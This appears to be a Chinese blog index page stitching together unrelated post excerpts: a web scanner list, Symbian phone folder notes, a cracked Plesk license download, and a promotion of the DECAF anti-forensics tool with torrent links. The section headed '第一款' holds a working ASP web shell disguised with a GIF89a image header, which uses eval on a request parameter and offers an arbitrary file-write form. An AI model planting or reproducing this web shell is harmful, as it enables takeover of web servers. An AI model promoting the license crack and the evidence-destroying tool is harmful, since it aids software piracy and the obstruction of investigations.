Chinadu`s Blog

unetbootin最新版下载地址：

http://unetbootin.sourceforge.net/

来源：网路游侠

在国内一些网站上经常看到文章说某某WEB应用安全评估工具排名，但是很可惜，绝大多数都是国外人搞的，界面是英文，操作也不方便，那就在这里综合下，列举下国内WEB安全评估人员常用的一些工具。当然，毫无疑问的，几乎都是商业软件，并且为了描述更准确，尽量摘取其官方网站的说明：
同时说明下：本排序不代表本人眼中的厂商或工具实力排名。

1.IBM Rational AppScan

IBM公司推出的IBM Rational AppScan产品是业界领先的应用安全测试工具，曾以 Watchfire AppScan 的名称享誉业界。Rational AppScan 可自动化 Web 应用的安全漏洞评估工作，能扫描和检测所有常见的 Web 应用安全漏洞，例如 SQL 注入（SQL-injection）、跨站点脚本攻击（cross-site scripting）及缓冲溢出（buffer overflow）等方面安全漏洞的扫描。
游侠标注：AppScan不但可以对WEB进行安全评估，更重要的是导出的报表相当实用，也是国外产品中唯一可以导出中文报告的产品，并且可以生成各种法规遵从报告，如ISO 27001、OWASP 2007等。
阅读全文...

第一款：

GIF89a$ ;<hTml>

<%eval request(chr(1))%>

<%

on error resume next

testfile=Request.form("filepath")

msg=Request.form("message")

if Trim(request("filepath"))<>"" then

set fs=server.CreateObject("scripting.filesystemobject")

set thisfile=fs.CreateTextFile(testfile,True)

thisfile.Write(""&msg& "")

if err =0 Then

response.write "<font color=red>ok</font>"

else

response.write "<font color=red>no</font>"

end if

err.clear

thisfile.close

set fs = nothing

End if

%>

<form method="POST" ACTION="">

<input type="text" size="20" name="filepath"

value="<%=server.mappath("go.asp")%>"> <BR>

<TEXTAREA NAME="Message" ROWS="5" COLS="40"></TEXTAREA>

<input type="submit" name="Send" value="go">

</form></body></html></body></html>

阅读全文...

1. C盘文件的具体介绍
C盘文件的具体介绍·（E盘文件的原理和C盘基本一样）·
Images 图像，图片存储文件夹
Sounds 声音片段，包含两个子文件夹
Sounds/Simple 铃声
Sounds/Digital 数字声音
Videos 视频片段，视频文件存储文件夹
Others 其他
System 是手机安装文件的系统文件夹下面对它里面的文件和文件夹做下具体的介绍：
Apps 存放的是安装软件程序的文件夹。
Apps/Phone 是更改网标后形成的文件夹，此目录中还有oplogo的子目录，bmp文件就存在这个目录里，删除这个文件就可以恢复手机默认的网标。
bootdata 存放的是手机导入数据，最好不要删除或者修改里面的文件。
Data 存放的是如ini、dat、cdr等后缀的文件，这些是程序所保存设置的数据，最好不要删除或者修改里面的文件。
dataNotepad.dat 存放的是记事本中的内容。
databackgroundimage.mbm 存放的是桌面墙纸图片文件。
dataApplications.dat 存放的是程序数据文件。
datawapstore 存放的是用WAP上网时的一些设定和网页缓存。
systemDataCLOCKAPP.dat 存放的是时钟设定存档文件。
systemDataCntModel.ini 存放的是电话本初始化文件。
systemDataContacts.cdb 存放的是电话本数据文件。
systemDataLogdbu.dat 手机的通讯数据文件。
systemDatamedialPlayer.dat 自带的RealOne播放机。
systemDatamms_seting.Dat 彩信的设置。
systemDataPinboard 捷径。
systemDataCalcsoft 自带的计算器。
systemDataCalendar 自带的日历。
DataTemplate.n01 存放的是手机短信信模版文件。
DataUnitConverter.int 手存放的是单位转换器初始化文件。
DataBookmarks.db 存放的是书签数据文件,用来记录WAP地址。
DataCACerts.dat 存放的是安装各种软件的证书文件。
Mail 目录下存放着短消息、彩信、电子邮件以及相关的一些设置文件。
SKINS 存放的是主题文件。
Shareddata 存放的是一些程序运行后的写入设置数据。
Temp和YReg 存放的是些临时目录。
Libs 目录里存放着软件相关的dll文件。
midp 存放的是安装的java程序。
Mtm 是有关信息设置的目录
Programs 存放的是一些自动加载的程序文件。
Recogs 存放的是关联方式文件的目录。
Schedules 存放的是一些计划任务类的文件。
favourites 存放的是收藏夹的文件，可移动到E盘的System中，收藏夹是不会受到影响。
install 存放的是软件的安装记录，其中install log文件可以删除，而带有sis后缀的文件最好不要删除，以免以后不能在程序管理里看到并删除程序了。
Magic101 在安装MGS平台的程序以后以后才会生成。
System.ini 系统初始化配置文件，可以删除，但是下次开机使用程序，系统还会再次生成。
Backup.xml 存放的是备份数据
**注意** C盘里面大多是系统文件，不知道它是究竟什么，以及具体的作用是什么，最好不要删除，以免删错了以后，导致手机的一些程序不能正常运行。
阅读全文...

网上找了半天plesk的破解版没找到能用的，最后专门找的国外站点，马上就搜到了。不过还是得修改一下破解文件，不然会每天半夜把你的管理员账户密码发 到一个邮箱pleskcrack@mail.ru。破解文件我已经修改过了。这儿提供下载，见最后的链接。破解方法是安装完原版9.0.1后，停止 plesk运行（直到显示stopped）。然后进入C:Program FilesParallelsPleskadminmodules，备份php_psakey.dll为php_psakey.dll.bak， 然后把破解文件复制进去就可以了。此破解版的plesk的许可证除了不支持MPC功能外，其他都没问题的。
下载地址：

阅读全文...

Md5 cracker online

Download:

From decafme.org ：

DECAF is a counter intelligence tool specifically created around the obstruction of the well known Microsoft product COFEE used by law enforcement around the world.

DECAF provides real-time monitoring for COFEE signatures on USB devices and running applications. Upon finding the presence of COFEE, DECAF performs numerous user-defined processes; including COFEE log clearing, ejecting USB devices, drive-by dropper, and an extensive list of Lockdown Mode settings. The Lockdown mode gives the user an automated approach to locking down the machine at the first sign of unusual law enforcement activity.

DECAF is highly configurable giving the user complete control to on-the-fly scenarios. In a moments notice, almost every piece of hardware can be disabled and pre-defined files can be deleted in the background. DECAF also gives the user an opportunity to simulate COFEE's presence by sending the application into a 'Spill the cofee' type mode. Simulation gives the user an opportunity to test his or her configuration before going live.

Future versions will have text message and email triggers so in case the computer needs to enter into lockdown mode the user can do it remotely. It will also have notification services where in the case of an emergency, someone can be notified (private torrent tracker admins). DECAF's next release is going to be available in a more light-weight version and/or a windows service.

反取证软件DECAF(全名是Detect and Eliminate Computer Assisted Forensics，检测和清除计算机法庭科学证据提取器)。DECAF程序只有181KB，它能删除COFEE的临时文件，杀死其进程，抹掉COFEE 的所有log，禁用USB，为了让COFEE无法追踪它甚至能制造出多种多样的欺骗性的MAC地址。需要提醒的是，DECAF没有提供源代码，所以我们并 不知道它到底对计算机干了什么。DECAF的开发者声称，未来的版本将允许电脑用户通过电子邮件或短消息远程关闭电脑，如果探测到电脑落入执法机关之手的 话。如果情况紧急它还能向同伴发出警告通知。

官方：http://www.decafme.org/

Download:

http://thepiratebay.org/torrent/5238072/DECAF-SOLDIERX.rar or
http://www.multiupload.com/88TEOEYCSZ

来自：瓜园

不敢在服务器上乱跑别人的程序，自己写了个。

我的规则比较搓，不过支持自定义，全部正则。

代码太丑陋就不发了，想改功能的自己逆一下。

下载地址：http://www.4shell.org/upload/8d6c2ddcd7a296f68c102906.rar